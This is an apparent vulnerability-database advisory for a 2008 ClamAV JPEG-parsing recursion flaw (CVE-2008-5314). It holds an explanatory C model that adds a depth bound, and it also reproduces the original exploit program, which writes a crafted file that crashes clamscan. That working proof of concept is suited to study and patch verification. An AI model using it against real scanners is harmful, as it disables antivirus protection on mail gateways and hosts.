ClamAV cli_check_jpeg_exploit Malformed JPEG File Denial of Service Vulnerability

Vulnerability ID 1116923    Vulnerability type: Resource management error
Published 2008-12-03    Updated 2009-02-13
CVE ID CVE-2008-5314    CNNVD ID CNNVD-200812-034
Platform: Multiple    CVSS score: 4.3
|Sources
https://www.exploit-db.com/exploits/7330
https://www.securityfocus.com/bid/32555
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-034
|Details
Clam AntiVirus is a GPL antivirus toolkit for Unix that many mail gateway products use. ClamAV's JPEG parsing code contains a recursive stack overflow. When a malicious JPEG file is scanned, the Photoshop thumbnail embedded in it (itself a JPEG) is scanned with the same cli_check_jpeg_exploit function, which is re-entered once per nesting level without any recursion limit being checked. A file that repeats the thumbnail structure often enough exhausts the scanner's stack. The effect is stack exhaustion and a crash of the scanning process (denial of service), not a controllable memory write, which is what the resource-management classification and the 4.3 CVSS score reflect. The issue affects ClamAV 0.94 and earlier and was fixed in 0.94.2 (see the oss-security CVE request and the release notes in the references). The vulnerable code in clamav-0.94\libclamav\special.c, abbreviated to the call chain:

int cli_check_jpeg_exploit(int fd) <-- fd to jpeg file
{
...
        if ((retval=jpeg_check_photoshop(fd)) != 0) {
                return retval;
        }
...
}
...
static int jpeg_check_photoshop(int fd)
{
...
        retval = jpeg_check_photoshop_8bim(fd);
...
}
...
static int jpeg_check_photoshop_8bim(int fd)
{
...
        retval = cli_check_jpeg_exploit(fd); <-- calls cli_check_jpeg_exploit() again without any recursion check
...
}
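As an added example (not ClamAV's code and not the exploit author's), the C program below models the same walk on an in-memory buffer: SOI, then marker segments; an APP13 segment whose body starts with "Photoshop 3.0" is parsed as 8BIM resources, and resource 0x040C (thumbnail) is followed, after its 28-byte header, into the embedded JPEG by re-entering the JPEG walk, which is exactly the cycle described above. The one difference is a depth counter at the top of the JPEG walk. MAX_THUMB_DEPTH, the result codes and the simplified segment-length handling are assumptions of this model, not ClamAV's values. The program builds the exploit's 60-byte record in memory (the same bytes clamav-jpeg-crash.jpg contains) so it runs without a file, and shows that 200000 records stop at depth 5 instead of consuming the stack.

```c
/* Added example (not ClamAV code): models the APP13 -> "Photoshop 3.0" -> 8BIM
 * thumbnail walk of special.c on an in-memory buffer and bounds the recursion
 * with a depth counter. MAX_THUMB_DEPTH is an assumed value. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_THUMB_DEPTH 4        /* assumed bound on nested thumbnails */
enum { JPG_CLEAN = 0, JPG_DEPTH_EXCEEDED = 1, JPG_TRUNCATED = 2 };

typedef struct {
    const unsigned char *buf;
    size_t len, pos;
    int max_depth;               /* < 0: no bound (the unpatched behaviour) */
    int deepest;                 /* deepest nesting level reached */
} jpg_t;

static int skip(jpg_t *j, size_t n) {
    if (n > j->len - j->pos) return 0;
    j->pos += n;
    return 1;
}
static int rd16(jpg_t *j, unsigned *v) {
    if (!skip(j, 2)) return 0;
    *v = (j->buf[j->pos - 2] << 8) | j->buf[j->pos - 1];
    return 1;
}
static int rd32(jpg_t *j, uint32_t *v) {
    unsigned hi, lo;
    if (!rd16(j, &hi) || !rd16(j, &lo)) return 0;
    *v = ((uint32_t)hi << 16) | lo;
    return 1;
}

static int check_jpeg(jpg_t *j, int depth);

/* One "8BIM" resource (signature already verified by the caller). Resource
 * 0x040C is a thumbnail: a 28-byte header followed by an embedded JPEG. This
 * is the edge the vulnerable walk followed without counting. */
static int check_8bim(jpg_t *j, int depth) {
    unsigned id, nlen; uint32_t size;
    if (!skip(j, 4) || !rd16(j, &id) || !skip(j, 1)) return JPG_TRUNCATED;
    nlen = j->buf[j->pos - 1];                       /* Pascal name, padded to even */
    if (!skip(j, nlen + (nlen % 2 == 0)) || !rd32(j, &size)) return JPG_TRUNCATED;
    if (id == 0x040C)
        return skip(j, 28) ? check_jpeg(j, depth + 1) : JPG_TRUNCATED;
    return skip(j, (size_t)size + (size & 1)) ? JPG_CLEAN : JPG_TRUNCATED;
}

static int check_photoshop(jpg_t *j, int depth) {
    if (j->len - j->pos < 14 || memcmp(j->buf + j->pos, "Photoshop 3.0", 14)) return JPG_CLEAN;
    j->pos += 14;
    while (j->len - j->pos >= 4 && memcmp(j->buf + j->pos, "8BIM", 4) == 0) {
        int r = check_8bim(j, depth);
        if (r != JPG_CLEAN) return r;
    }
    return JPG_CLEAN;
}

static int check_jpeg(jpg_t *j, int depth) {
    unsigned marker, seglen;
    if (depth > j->deepest) j->deepest = depth;
    if (j->max_depth >= 0 && depth > j->max_depth) return JPG_DEPTH_EXCEEDED; /* the missing check */
    if (!rd16(j, &marker) || marker != 0xFFD8) return JPG_CLEAN;   /* no SOI: not a JPEG */
    while (rd16(j, &marker) && rd16(j, &seglen)) {
        if ((marker & 0xFF00) != 0xFF00 || marker == 0xFFDA) return JPG_CLEAN; /* lost sync / SOS */
        if (marker == 0xFFED) {        /* APP13: walk the Photoshop data; length ignored as in the original */
            int r = check_photoshop(j, depth);
            if (r != JPG_CLEAN) return r;
        } else if (seglen < 2 || !skip(j, seglen - 2)) {
            return JPG_TRUNCATED;
        }
    }
    return JPG_CLEAN;
}

/* Scan a JPEG held in memory; *deepest receives the nesting level reached. */
int scan_jpeg_buf(const unsigned char *buf, size_t len, int max_depth, int *deepest) {
    jpg_t j = { buf, len, 0, max_depth, 0 };
    int r = check_jpeg(&j, 0);
    if (deepest) *deepest = j.deepest;
    return r;
}

/* The exploit's 60-byte record (constructed here, byte-identical to crashstr). */
static const unsigned char CRASH_REC[60] =
    "\xff\xd8" "\xff\xed" "\x00\x02" "Photoshop 3.0\x00" "8BIM" "\x04\x0c"
    "\x00" "\x01" "\x01\x01\x01\x01" "0123456789012345678912345678";

/* n records back to back, i.e. the content of clamav-jpeg-crash.jpg for NR_ITER = n. */
int scan_crash_file(size_t n, int max_depth, int *deepest) {
    unsigned char *buf = malloc(n * sizeof CRASH_REC);
    int r;
    if (!buf) return JPG_TRUNCATED;                  /* allocation failure treated as unreadable */
    for (size_t i = 0; i < n; i++) memcpy(buf + i * sizeof CRASH_REC, CRASH_REC, sizeof CRASH_REC);
    r = scan_jpeg_buf(buf, n * sizeof CRASH_REC, max_depth, deepest);
    free(buf);
    return r;
}
int scan_crash_file_depth(size_t n, int max_depth) {
    int d = 0;
    scan_crash_file(n, max_depth, &d);
    return d;
}
/* A constructed benign JPEG (SOI, empty APP0, EOI) has nothing to recurse into. */
int scan_benign_sample(void) {
    static const unsigned char jfif[] = { 0xFF,0xD8, 0xFF,0xE0,0x00,0x04,0x00,0x00, 0xFF,0xD9 };
    return scan_jpeg_buf(jfif, sizeof jfif, MAX_THUMB_DEPTH, NULL);
}

int main(void) {
    int d, r = scan_crash_file(200000, MAX_THUMB_DEPTH, &d);
    printf("200000 records, bound %d: result %d, deepest %d\n", MAX_THUMB_DEPTH, r, d);
    r = scan_crash_file(5, -1, &d);
    printf("5 records, unbounded: result %d, deepest %d\n", r, d);
    return 0;
}
```

Passing max_depth = -1 reproduces the unbounded behaviour; do that only on a handful of records, since with 200000 of them the model recurses 200000 frames deep and dies just as clamscan did. The line worth carrying into any recursive container scanner is the depth check at the top of check_jpeg: every edge that re-enters the same parser (thumbnail in JPEG, archive in archive) needs a counter threaded through by the caller, because a file can repeat that edge as many times as its size allows.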
|Exploit
/*
There is a recursive stack overflow in clamav 0.93.3 and 0.94 (and probably
older versions) in the jpeg parsing code.
It scans the jpeg file, and if there is a thumbnail, it'll scan that too. The
thumbnail itself is just another jpeg file and the same jpeg scanning function
gets called without checking any kind of recursion limit. This can easily
lead to a recursive stack overflow. The vulnerable code looks like:
clamav-0.94\libclamav\special.c
int cli_check_jpeg_exploit(int fd) <-- fd to jpeg file
{
...
                        if ((retval=jpeg_check_photoshop(fd)) != 0) {
                                return retval;
                        }
...
}
...
static int jpeg_check_photoshop(int fd)
{
...
                retval = jpeg_check_photoshop_8bim(fd);
...
}
...
static int jpeg_check_photoshop_8bim(int fd)
{
...
        retval = cli_check_jpeg_exploit(fd); <-- calls cli_check_jpeg_exploit()
                                                 again without any recursion checks!
...
}

The exploit shown below triggers this recursive stack overflow by creating a
fake jpg file. Once created and passed on to clamav, it'll go into a recursive
stack loop until clamav runs out of stack memory and causes a stack overflow,
effectively crashing clamav. The exploit was tested on clamav 0.94 on
opensolaris running in a vmware.
exploit:
*/

const char crashstr[] = "\xff\xd8" // SOI marker: start of a (nested) jpeg
                        "\xff\xed" // APP13 marker (Photoshop IRB segment, not Exif)
                        "\x00\x02" // segment length, ignored by the vulnerable walk
                        "Photoshop 3.0\x00"
                        "8BIM"     // image resource block signature
                        "\x04\x0c" // resource id 0x040C: thumbnail
                        "\x00"     // Pascal name: length 0
                        "\x01"     // pad byte (name padded to even length)
                        "\x01\x01\x01\x01" // resource size (never checked)
                        "0123456789012345678912345678"; // 28-byte thumbnail header; next record's SOI follows

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>

#define NR_ITER 200000

int main() {
        FILE *fp;
        int i;
        fp = fopen("clamav-jpeg-crash.jpg", "w+");
        if (!fp) {
                printf("can't open/create file\n");
                exit(0);
        }
        for (i = 0; i < NR_ITER; i++) {
                fwrite(crashstr, sizeof(crashstr)-1 /* drop the terminating NUL */, 1, fp);
        }
        fclose(fp);
        printf("done, now run clamscan on ./clamav-jpeg-crash.jpg\n");
        exit(0);
}

/*
result: 
ilja@opensolaris:~$ ./jpg
done, now run clamscan on ./clamav-jpeg-crash.jpg
ilja@opensolaris:~$ /usr/local/bin/clamscan ./clamav-jpeg-crash.jpg 
LibClamAV Warning: **************************************************
LibClamAV Warning: ***  The virus database is older than 7 days!  ***
LibClamAV Warning: ***   Please update it as soon as possible.    ***
LibClamAV Warning: **************************************************
Segmentation Fault <-- clamav crashed !
ilja@opensolaris:~$
*/

// milw0rm.com [2008-12-03]
|Affected Products
Ubuntu: Ubuntu Linux 8.10 sparc
Ubuntu: Ubuntu Linux 8.10 powerpc
Ubuntu: Ubuntu Linux 8.10 lpia
Ubuntu: Ubuntu Linux 8.10 i386
Ubuntu: Ubuntu Linux 8.10 amd64
SuSE: SUSE Linux
|References

Source: wwws.clamav.net
Link: https://wwws.clamav.net/bugzilla/show_bug.cgi?id=1266
Source: XF
Name: clamav-special-dos(46985)
Link: http://xforce.iss.net/xforce/xfdb/46985
Source: UBUNTU
Name: USN-684-1
Link: http://www.ubuntu.com/usn/usn-684-1
Source: SECTRACK
Name: 1021296
Link: http://www.securitytracker.com/id?1021296
Source: BID
Name: 32555
Link: http://www.securityfocus.com/bid/32555
Source: MLIST
Name: [oss-security] 20081201 CVE request: clamav 0.94.2
Link: http://www.openwall.com/lists/oss-security/2008/12/01/8
Source: MILW0RM
Name: 7330
Link: http://www.milw0rm.com/exploits/7330
Source: MANDRIVA
Name: MDVSA-2008:239
Link: http://www.mandriva.com/security/advisories?name=MDVSA-2008:239
Source: VUPEN
Name: ADV-2009-0422
Link: http://www.frsirt.com/english/advisories/2009/0422
Source: VUPEN
Name: ADV-2008-3311
Link: http://www.frsirt.com/english/advisories/2008/3311
Source: DEBIAN
Name: DSA-1680
Link: http://www.debian.org/security/2008/dsa-1680
Source: support.apple.com
Link: http://support.apple.com/kb/HT3438
Source: sourceforge.net
Link: http://sourceforge.net/project/shownotes.php?group_id=86638&release_id=64